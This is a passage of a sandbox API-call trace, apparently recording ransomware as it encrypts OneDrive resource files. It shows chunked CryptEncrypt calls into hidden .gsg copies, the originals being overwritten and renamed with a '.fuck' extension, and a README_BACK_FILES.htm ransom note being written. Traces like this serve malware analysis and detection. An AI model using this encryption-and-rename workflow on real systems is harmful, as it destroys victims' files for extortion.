returned 1 [0278.109] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.109] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.109] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.109] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.109] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.109] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.109] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.109] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.109] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.109] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.109] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.109] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.110] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.110] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.110] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.110] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.110] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.110] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.110] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.110] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.110] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.110] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.110] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.110] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.110] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.110] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.111] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.111] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.111] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.111] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.111] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.111] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.111] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.111] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.111] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.111] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.111] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.111] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.111] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.111] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.112] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.112] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.112] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.112] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.112] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.112] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.112] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.112] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.112] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.112] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.112] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.112] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.112] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.112] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.113] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.113] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.113] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.113] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.113] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.113] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.113] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.113] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.113] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.113] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.113] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.113] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.113] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.113] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.114] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.114] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.114] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x250, lpOverlapped=0x0) returned 1 [0278.114] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x250, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x260) returned 1 [0278.114] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x260, lpOverlapped=0x0) returned 1 [0278.114] CloseHandle (hObject=0x5d48) returned 1 [0278.114] CloseHandle (hObject=0x5d3c) returned 1 [0278.114] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\is\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\is\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0278.126] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0278.130] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\is\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0278.132] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\is\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\is\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0278.134] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0278.134] CryptDestroyKey (hKey=0x2fb688) returned 1 [0278.134] CryptReleaseContext (hProv=0x2f2d9b8, dwFlags=0x0) returned 1 [0278.134] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0278.134] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0278.135] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\is\\readme_back_files.htm")) returned 0xffffffff [0278.135] AreFileApisANSI () returned 1 [0278.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28895b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0278.135] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\is\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0278.136] GetFileType (hFile=0x5d4c) returned 0x1 [0278.136] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0278.137] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0278.137] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0278.138] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0278.138] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0278.138] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0278.138] GetLastError () returned 0x0 [0278.138] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\it\\filesync.localizedresources.dll.mui")) returned 0x20 [0278.138] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0278.139] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\it\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0278.140] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\it\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0278.142] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0278.143] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2d600) returned 1 [0278.145] CryptCreateHash (in: hProv=0x2f2d600, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 